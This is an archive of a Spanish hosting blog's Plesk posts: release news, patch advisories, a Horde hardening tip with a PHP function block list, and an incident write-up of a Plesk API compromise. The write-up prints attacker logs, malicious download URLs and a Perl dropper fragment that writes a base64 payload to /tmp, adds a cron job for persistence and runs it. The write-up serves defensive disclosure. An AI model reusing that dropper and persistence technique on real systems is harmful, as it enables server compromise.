Archive for the ‘Plesk’ category

« Older Entries

Usando Horde con safe_mode para enviar por smtp y no usar sendmail

March 15th, 2012

Seguramente esté muy documentado ya por ahí pero es muy recomendable dejar de usar horde bajo sendmail con el fin de securizar la máquina. Con el cambio que comentamos a continuación, evitamos tener que ejecutar comandos en la máquina local, ya que el correo lo enviamos vía smtp al servidor local o a cualquier otro servidor que configuremos.

Resumen rápido:

Deshabilitamos la mayor parte de funciones potencialmente peligrosas para el sistema.
Esto implica que fallen algunas aplicaciones, como Horde

# /etc/php5/apache2/php.ini)
disable_functions = system,passthru,readfile,escapeshellarg,proc_close,proc_open,ini_alter,dl,show_source,curl_exec

La alternativa elegante sería activar safe_mode y dejar de usar sendmail, como vemos en el fragmento de la configuración de Horde:

# fragmento de la configuracion de horde
# /etc/psa-webmail/horde/horde/conf.p
if (ini_get("safe_mode") == "1") { // Safe mode in action
$conf['mailer']['params']['host'] = '127.0.0.1';
$conf['mailer']['params']['port'] = 25;
$conf['mailer']['params']['auth'] = false;
$conf['mailer']['type'] = 'smtp';
} else {
$conf['mailer']['params']['sendmail_path'] = '/usr/sbin/sendmail';
$conf['mailer']['params']['sendmail_args'] = '-oi';
$conf['mailer']['type'] = 'sendmail';
}

En Plesk10 se han definido plantillas para los servicios de forma que aunque cambiasemos los ficheros de configuarción de apache estos cambios se terminarían machacando y volveríamos al estado por defecto.

Para ello, Plesk ha provisto un repositorio de plantillas para configurar los servicios en /usr/local/psa/admin/conf/templates/

Para reconfigurar la plantilla tenemos aqui un copy&paste muy cómodo, como siempre nos gusta:

# reemplazar safe_mode en la plantilla
sed -i 's/safe_mode off/safe_mode on/g' /usr/local/psa/admin/conf/templates/default/horde.php
# reconfigurar las plantillas
/usr/local/psa/admin/bin/httpdmng --reconfigure-server
# recargar el servicio
apache2ctl graceful

Para probarlo es necesario cerrar la sesión de Horde y volver a autenticarse.

No comments »

Posted in Artículos, debian, Plesk, seguridad

Vulnerabilidad CRÍTICA en la API de Plesk

March 5th, 2012

Hace unas semanas se notificó por parte de Parallels un fallo crítico en el su software de panel de control de hosting: Plesk. Hicimos referencia a la nota en nuestro blog http://hostingaldescubierto.com/wordpress/2012/02/10/plesk-fallo-critico-de-seguridad-sql-injection/

Reciemiente hemos tenido accesos a una máquina usando este fallo de seguridad y vamos a compartir con vosotros algunas observaciones de estos accesos:

En el sistema se observan procesos perl no habituales, con lo que procedemos a buscar el origen del mismo con lsof y el resultado es que el origen del proceso pertenece a “/tmp/…” y se se ha eliminado. Ya esto nos da una idea de que el proceso no es para nada un proceso autorizado.

Verificamos /tmp y /var/tmp donde encontramos algunos ficheros ajenos al sistema pero sin contenido.

Si nos enganchamos al proceso , podemos ver que constantemente se está descargando ficheros de diversas urls con wget:


https://eycgkhkxfs.tmdnzapomk.info:1905//b/index.php?id=...

https://94.23.208.20:1905//b/index.php?id

https://rqckfdgumv.sxobnmbjzb.info:1905//b/index.php?...

Después de consultar algunas fuentes ( gracias Logan ) vemos que en los ficheros de logs de panel de control de plesk en /usr/local/psa/admin/logs/httpsd_access_log tenemos llamadas al fichero agent.php de la api de Plesk y posteriormente accesos al panel de control donde se suben ficheros a diversos dominios.

httpsd_access_log.processed.1.gz:78.139.244.50 dd.com:8443 - [13/Feb/2012:00:33:05 +0100] "POST /enterprise/control/agent.php HTTP/1.1" 200 74360 "-" "-"
httpsd_access_log.processed.1.gz:78.139.244.50 dd.com:8443 - [13/Feb/2012:03:04:52 +0100] "POST /enterprise/control/agent.php HTTP/1.1" 200 74360 "-" "-"
httpsd_access_log.processed.1.gz:78.139.244.50 dd.com:8443 - [13/Feb/2012:03:37:21 +0100] "POST /enterprise/control/agent.php HTTP/1.1" 200 74360 "-" "-"

110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:12:37 +0100] "POST /login_up.php3 HTTP/1.1" 200 966 "https://x.x.x.x:8443/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)"
110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:12:42 +0100] "GET /plesk/client@3/domain@/?context=domains HTTP/1.1" 200 29327 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)"
110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:12:50 +0100] "GET /plesk/client@3/domain@222/hosting/file-manager/?cmd=chdir&file=%2Fcgi-bin%2F HTTP/1.1" 200 39293 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)"
110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:13:06 +0100] "POST /plesk/client@3/domain@222/hosting/file-manager/create-file/ HTTP/1.1" 303 0 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)"

y dentro del dominio en la carpeta /cgi-bin/ vemos ficheros .cgi con el contenido de los scripts que el atacante ha subido.

Un fragmento de uno de los scripts nos indica que los procesos ejecutados en el sistema provienen de esos ficheros

open(OLD_UNIX, ">", "/tmp/.X11-unix");
print OLD_UNIX decode_base64("....L....");
close(OLD_UNIX);
system("echo '* * * * * perl /tmp/.X11-unix >/dev/null 2>&1' >
/tmp/cron.d ; crontab /tmp/cron.d ; rm /tmp/cron.d");
system("perl /tmp/.X11-unix");
print "exdone\n";

Como medidas para prevenir este fallo de seguridad hay que actualizar Plesk aplicando los microupdates.
Reviar /var/spool/cron aunque en nuestro caso no se han encontrado crontabs ajenos.
Es recomendable también ajustar los permisos para wget, curl y get

http://kb.parallels.com/en/113321

En breve daremos más detalles de las evidencias obtenidas.

2 comments »

Posted in Artículos, Plesk, Software

Github hacked

February 15th, 2012

Pues sí, la seguridad de Github ha sido comprometida hace unos días aquí teneis un enlace de Slashdot.

En este otro sitio teneis una entrada en el blog del propio github

Si teneis cuenta en github se recomienda encarecidamente que cambieis vuestras credenciales

No comments »

Posted in debian, Plesk, seguridad

Tags:

Plesk Fallo crítico de seguridad: SQL Injection

February 10th, 2012

Se ha notificado desde Parallels a todos los clientes de que existe un fallo grave de seguridad que permitie la inyección de código SQL que afecta a algunas versiones antiguas de Plesk . Las versiones afectadas son :

  • Linux – Plesk 10.3.1
  • Linux – Plesk 9.5.4
  • Linux – Plesk 8.6.0
  • Windows 10.3.1
  • Windows Plesk 9
  • Windows Plesk 8

Se han publicado parches para solucionar estos problemas. Instalando los microupdates se corrije el problema, excepto en las versiones para Windows Plesk 9 y Windows Plesk 8 que se han publicado parches específicos en este enlace :

How to fix vulnerability in Plesk 8.6, 9.3, and 9.5 for Windows

Para las versiones linux se puede ejecutar este comando para actuailzar la distribución:

/usr/local/psa/admin/sbin/autoinstaller --select-product-id plesk --select-release-current --reinstall-patch --install-component base

Y por último si queremos verificar la versión de nuestra instalación lo podemos comprobar así:

cat /usr/local/psa/version

No hace falta decir que es crítico actualizar el sistema.

1 comment »

Posted in Noticias, Plesk, seguridad

Tags:

Parallels Plesk Panel 10.4 Publicada !

November 9th, 2011

A partir de la pasada noche los Partners de Parallels ya tienen a su disposición la versión 10.4 del famoso panel de control de origen ruso. Estará a disposición del público en general a partir del 22 de Noviembre.

Descargas y documentacion :

 

Se ofrecen varios ‘webminars’ de formación con los nuevos cambios

 

  • Webinar: Parallels Partner Training on Plesk 10.4 for C-level and marketers
    Monday, November 14th – 12:00-1:00pm (Seattle, GMT -8)
    Register at http://bit.ly/t68i2g
  • Webinar: Parallels Partner Technical Training on Plesk 10.4
    Tuesday, November 15th – 08:00-09:00am (Seattle, GMT-8)
    Register at http://bit.ly/uJsiHL
  • Webinar: Parallels Partner Sales Training
    Monday, November 28th – 10:00-11:00am (Seattle, GMT -8)
    Register at http://bit.ly/sCp0w8

No comments »

Posted in hosting, Noticias, Plesk

Parallels Plesk Panel 10.4 Marketing Preview

October 26th, 2011

Parallels anuncia su nueva release para el 18 de Noviembre. Seguramente ya es conocido por todos los lectores qué es Parallels Plesk Panels, para los que no, que sepais que Plesk es software de gestión de hosting que permite gestionar dominios, cuentas de correo, cuentas ftp, certificados, ssl e integrarlo con otras aplicaciones de Parallels. Aquí teneis más informacion http://www.parallels.com/products/plesk/

¿ qué tienes que hacer para probalarla ? fácil, puedes encontrarla aquí http://www.parallels.com/download/plesk10.4

Resumiendo las mejoras importantes:
* Configuración de php.ini por dominio
* Configuración de módulos de apache: activar y desactivar módulos
* Dedicar una ip de salida a un cliente para enviar correo
* Descargar ficheros de log vía ftp
* Buzones de correo no aceptan nuevos mails si han superado la quota de espacio
* Mejoras en el sistema de backup ( siempre ha sido un punto débil de Plesk menos en la versión 8 )
* Mejoras en las herramientas de migración ( otra herramienta delicada que no siempre funciona bien )

Esto es lo más destacable, pero para ver la lista completa podeis pasaros por estos enlaces :

* Parallels Plesk Panel 10.4 for Linux-based Operating Systems release notes
* Parallels Plesk Panel 10.4 for Windows-based Operating Systems release notes

No comments »

Posted in Plesk, Software

Parallels 10.3 Preview

June 7th, 2011

Hace escasos minutos nos ha llegado el mail de invitación para ir probando la versión 10.3 de Parallels.
Como su nombre indica es una preview, la primera, así que incluirán algunos cambios en la versión final.

Para todos aquellos impacientes , aquí teneis un enlace ;)

Parallels 10.3 Preview/

No comments »

Posted in Plesk, Software

[plesk] status=bounced (Message can’t be delivered )

April 12th, 2011

Este error en Plesk 10.x con Postfix aparece cuando el buzón está lleno

El error aparece en el fichero /usr/local/psa/admin/log/maillog

status=bounced (Message can't be delivered )

No comments »

Posted in Plesk

[Plesk] Nueva versión Parallels Plesk Panel 10.2

April 4th, 2011

Parallels lanza una nueva release de su panel de control Plesk. La versión 10.2 trae nuevas funcionalidades como soporte para ipv6 y quizás lo que sea más interesante el soporte SNI que permite usar varios certificados ssl con una sóla IP y no como hasta ahora que era necesario usar una IP por certificado ( http://en.wikipedia.org/wiki/Server_Name_Indication )

Otro gran cambio es que el fichero /etc/psa/.psa.shadow pasa a ser un fichero cifrado, para que tus scripts sigan funcionando deberás usar este comando /usr/local/psa/bin/admin –show-password

Soporte para Red Hat Enterprise 6 , Debian 6 y Suse 11.4

Además corrige algunos bugs ademas de mejoras en la restauración y migración, migración de certificados ssl, etc…

más información en las notas de release :

http://download1.parallels.com/Plesk/PP10/10.2.0/release-notes/parallels-plesk-panel-10.2.0-for-linux-based-os.html

2 comments »

Posted in Noticias, Plesk, Software

[plesk] Fallo de seguridad en bind para Plesk Windows

February 27th, 2011

Vía newsleter de Parallels, se nos informa de una vulnerabilidad de BIND que puede provocar una denegación de servicio ( DOS ) causado por la recepción de una mensaje de actualización específicamente diseñado

Para evitar esta vulnerabilidad que afecta a Bind 9.7.1 ( Parallels Plesk Panel 9.5 for windows ) y y 9.7. ( Parallels Plesk Panel 10 for windows ) deben ser actualizados a Bind 9.7.3 immediatamente.

La vulenariblidad se detalla en :

https://www.isc.org/software/bind/advisories/cve-2009-0696

Detalles de como actualizar BIND para Plesk Windows en http://kb.parallels.com/5542

Parallels está preparando un parche para liberarlo próximamente.

No comments »

Posted in Plesk, seguridad, Software, windows